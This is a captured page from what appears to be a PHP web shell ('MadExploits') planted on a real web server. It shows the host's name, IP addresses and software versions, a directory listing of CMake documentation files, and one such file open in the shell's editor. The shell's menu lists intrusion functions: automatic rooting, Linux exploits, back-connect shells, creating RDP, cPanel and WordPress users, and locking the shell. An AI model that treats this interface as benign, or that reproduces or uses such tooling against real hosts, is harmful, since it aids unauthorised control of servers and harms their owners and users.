Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
cmake3 /
Help /
prop_gbl /
[ HOME SHELL ]
Name
Size
Permission
Action
ALLOW_DUPLICATE_CUSTOM_TARGETS...
1015
B
-rw-r--r--
AUTOGEN_SOURCE_GROUP.rst
616
B
-rw-r--r--
AUTOGEN_TARGETS_FOLDER.rst
423
B
-rw-r--r--
AUTOMOC_SOURCE_GROUP.rst
232
B
-rw-r--r--
AUTOMOC_TARGETS_FOLDER.rst
500
B
-rw-r--r--
AUTORCC_SOURCE_GROUP.rst
232
B
-rw-r--r--
CMAKE_CUDA_KNOWN_FEATURES.rst
885
B
-rw-r--r--
CMAKE_CXX_KNOWN_FEATURES.rst
9.86
KB
-rw-r--r--
CMAKE_CXX_KNOWN_FEATURES.rst.r...
9.86
KB
-rw-r--r--
CMAKE_C_KNOWN_FEATURES.rst
1.02
KB
-rw-r--r--
CMAKE_C_KNOWN_FEATURES.rst.ren...
1.01
KB
-rw-r--r--
CMAKE_ROLE.rst
359
B
-rw-r--r--
DEBUG_CONFIGURATIONS.rst
534
B
-rw-r--r--
DISABLED_FEATURES.rst
455
B
-rw-r--r--
ECLIPSE_EXTRA_CPROJECT_CONTENT...
495
B
-rw-r--r--
ECLIPSE_EXTRA_NATURES.rst
342
B
-rw-r--r--
ENABLED_FEATURES.rst
447
B
-rw-r--r--
ENABLED_LANGUAGES.rst
155
B
-rw-r--r--
FIND_LIBRARY_USE_LIB32_PATHS.r...
459
B
-rw-r--r--
FIND_LIBRARY_USE_LIB64_PATHS.r...
431
B
-rw-r--r--
FIND_LIBRARY_USE_LIBX32_PATHS....
465
B
-rw-r--r--
FIND_LIBRARY_USE_OPENBSD_VERSI...
394
B
-rw-r--r--
GENERATOR_IS_MULTI_CONFIG.rst
370
B
-rw-r--r--
GLOBAL_DEPENDS_DEBUG_MODE.rst
297
B
-rw-r--r--
GLOBAL_DEPENDS_NO_CYCLES.rst
428
B
-rw-r--r--
IN_TRY_COMPILE.rst
192
B
-rw-r--r--
JOB_POOLS.rst
1.13
KB
-rw-r--r--
PACKAGES_FOUND.rst
226
B
-rw-r--r--
PACKAGES_NOT_FOUND.rst
242
B
-rw-r--r--
PREDEFINED_TARGETS_FOLDER.rst
362
B
-rw-r--r--
REPORT_UNDEFINED_PROPERTIES.rs...
295
B
-rw-r--r--
RULE_LAUNCH_COMPILE.rst
433
B
-rw-r--r--
RULE_LAUNCH_CUSTOM.rst
428
B
-rw-r--r--
RULE_LAUNCH_LINK.rst
432
B
-rw-r--r--
RULE_MESSAGES.rst
605
B
-rw-r--r--
TARGET_ARCHIVES_MAY_BE_SHARED_...
225
B
-rw-r--r--
TARGET_MESSAGES.rst
745
B
-rw-r--r--
TARGET_SUPPORTS_SHARED_LIBS.rs...
340
B
-rw-r--r--
USE_FOLDERS.rst
393
B
-rw-r--r--
XCODE_EMIT_EFFECTIVE_PLATFORM_...
949
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ALLOW_DUPLICATE_CUSTOM_TARGETS.rst
ALLOW_DUPLICATE_CUSTOM_TARGETS ------------------------------ Allow duplicate custom targets to be created. Normally CMake requires that all targets built in a project have globally unique logical names (see policy :policy:`CMP0002`). This is necessary to generate meaningful project file names in :generator:`Xcode` and :ref:`Visual Studio Generators` IDE generators. It also allows the target names to be referenced unambiguously. Makefile generators are capable of supporting duplicate :command:`add_custom_target` names. For projects that care only about :ref:`Makefile Generators` and do not wish to support :generator:`Xcode` or :ref:`Visual Studio Generators` IDE generators, one may set this property to ``True`` to allow duplicate custom targets. The property allows multiple :command:`add_custom_target` command calls in different directories to specify the same target name. However, setting this property will cause non-Makefile generators to produce an error and refuse to generate the project.
Close